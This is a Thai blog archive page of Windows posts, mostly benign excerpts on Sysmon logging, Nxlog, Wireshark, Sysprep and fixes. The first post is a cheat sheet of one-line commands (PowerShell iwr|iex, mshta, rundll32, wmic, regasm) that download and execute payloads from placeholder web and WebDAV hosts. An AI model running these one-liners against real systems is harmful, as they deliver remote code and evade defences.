24 posts
Windows
โพสต์นี้ไม่มีอะไรมาก เพียงแต่ไปเจอ list command สำหรับการ download & execute ไฟล์ใน Windows แบบเป็น oneline คือ 1 บรรทัดแล้วจบเลย ก็เลยจะเอามาโน็ตไว้เผื่อจะใช้ในอนาคตครับ Powershell
Cmd
Cscript
Mshta
Rundll32
WMIC
Regasm/Regsvc
…
1 2 3 4 |
//ผ่านเว็บปกติ powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex" // ผ่าน webdav powershell -exec bypass -f \\webdavserver\folder\payload.ps1 |
1 |
cmd.exe /k < \\webdavserver\folder\batchfile.txt |
1 |
cscript //E:jscript \\webdavserver\folder\payload.txt |
1 2 3 |
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) mshta http://webserver/payload.hta mshta \\webdavserver\folder\payload.hta |
1 2 |
rundll32 \\webdavserver\folder\payload.dll,entrypoint rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); |
1 |
wmic os get /format:"https://webserver/payload.xsl" |
1 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll |
เมื่อช่วงสัปดาห์ที่ผ่านมา René Freingruber (@ReneFreingruber) จาก SEC Consult Vulnerability Lab ได้ออก post เกี่ยวกับ trick การ bypass Windows defend mechanism ต่างๆ ออกมา โดยผมเอามาสรุปให้อีกทีดังนี้ครับ (ทั้งหมดนี้ได้ถูกแจ้งไปยัง Microsoft และออก patch แก้ไขแล้วครับ) 1. วิธีการสร้าง folder ใน path ที่ user…
หลังจาก MacOS รุ่นล่าสุดออกมา Apple ก็ได้ออกมาประกาศเรื่อง File System ใหม่ที่ชื่อว่า APFS ซึ่งมันก็คือ Apple File System นั่นเอง โดยเราสามารถ mount ได้โดยการติดตั้ง Application ของ APFS for Windows from Paragon นั่นเอง โดยเมื่อทำการ download และติดตั้งเรียบร้อยแล้ว เมื่อทำการเสียบ HDD ที่เป็น…
ก่อนหน้านี้เราใช้งาน Solarwind syslog เพื่อทำการส่ง log ของ Windows ไปยัง syslog server กันมาแล้ว มาคราวนี้มาเปลี่ยนไปใช้ Nxlog กันบ้างครับ Nxlog Community Edition เป็นตัวฟรีสำหรับการส่ง log ไปในรูปแบบต่างๆไม่ว่าจะเป็น Syslog, CSV, GELF, JSON, XML, Windows EventLog และ even custom…
สืบเนื่องด้วยมีการสอบถามการติดตั้ง Wireshark มา คือแม้มันจะง่าย แต่ก็มีความเป็นไปได้ที่คนเค้าจะไม่รู้จริงๆ ก็มา มาติดตั้ง Wireshark กันครับ 1. Download Wireshark จาก https://www.wireshark.org แล้วเลื่อนไปด้านล่างสุดของเพจ เลือกไฟล์ให้เหมาะกับระบบของตน 2. Double click เพื่อติดตั้ง 3. กด Next กด I Agree กด Next กด Next กด…
โดยปกติแล้วการ cloning Windows VM ไปใช้ สิ่งที่ติดไปด้วยคือชื่อเครื่อง, รายละเอียด unique ID ของ Windows นั้นๆ และอื่นๆ มันจะติดไปด้วย ทีนี้หากเราต้องการทำเป็น General Windows Image ท่ี cloning ไปใช้ได้ทันที แบบไม่ต้องมานั่งไล่ลบหรือ setting ข้อมูลเหล่านี้ใหม่เองจะทำไง เราสามารถทำได้โดยใช้โปรแกรมที่ Windows ให้มาอยู่แล้ว นั่นคือ Sysprep นั่นเอง…
เราพูดถึง Sysmon มาหลายต่อหลายครั้งแล้ว ครั้งนี้จะเป็นการนำ log ของ Sysmon มาทำเป็นกราฟเพื่อให้ดูข้อมูลให้เห็นภาพง่ายขึ้นโดยใช้ Neo4j ครับ โดยเราจำเป็นต้องใช้ logstash ในการส่ง log ไปยัง Neo4j หรือจะส่งไปยัง ElasticSearch เพิ่มเติมก็ได้และสำคัญสุดคือเราจะใช้ Winlogbeat ในการอ่าน log ของ Sysmon ไปยัง Logstash จากนั้นก็เข้าลูปการส่งข้อมูลและแสดงผลที่ Neo4j ครับ โอเคพอไล่เสร็จหน้าตาจะออกมาเป็นแบบนี้ครับ…
หลังจากที่เราเคยพูดเรื่องการเก็บ log โดยใช้ Sysmon กันแล้ว ทีนี้หากเราต้องการจะส่ง log ไปเก็บข้อมูลอยู่ที่ Centralize Log Server เพื่อนำไปทำ Correlation กับ log อื่นๆ หรือการเก็บ log ตามพรบ.ก็แล้วแต่ เราสามารถทำได้โดยการติดตั้ง Agent เพิ่มเติม โดยในที่นี้เราจะใช้เป็น Solarwinds Event Log Forwarder for Windows สามารถทำได้ดังนี้…
ก่อนหน้านี้ผมเคยพูดถึงเรื่องการติดตั้ง Sysmon เพื่อคอยเก็บ log การทำงานใดๆบนเครื่อง ไม่ว่าจะเป็นการใช้งานคำสั่ง การสร้างไฟล์ การเปลี่ยนเวลาของไฟล์ และอื่นๆ โดยเปิด Event Viewer ขึ้นมา จากนั้นไปที่ Applications and Services Logs\Microsoft\Windows\Sysmon\Operational แต่หากเราต้องการจะ view log ของ Sysmon ผ่านทาง Powershell ก็สามารถทำได้เช่นกัน โดยใช้คำสั่งเป็น
หากต้องการดูเฉพาะ activity…
1 |
Get-WinEvent -filterhashtable @{logname="Microsoft-Windows-Sysmon/Operational";id=XX} |
วันนี้ผมเจอปัญหาแปลกๆของ Windows 10 อีกแล้ว (ซึ่งหลังๆเหมือนจะเจอบ่อยขึ้นทุกที) นั้นคือการที่หลังจาก upgrade แล้วกลายเป็นไม่สามารถพิมพ์คำสั่งหรือพิมพ์ค้นหาใดๆในช่อง Windows Search, Taskbar ด้านล่างได้เลย ดังนั้นสิ่งที่ทำคือหา solution แก้ไข โดย 1. เข้าไปที่ C:\Windows\System32 2. Click ขวาที่ ctfmon.exe แล้วเลือก Copy 3. จากนั้นไปที่ C:\Users\<UserName>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup หรือไม่ก็พิมพ์ shell:startup…
Recent Comments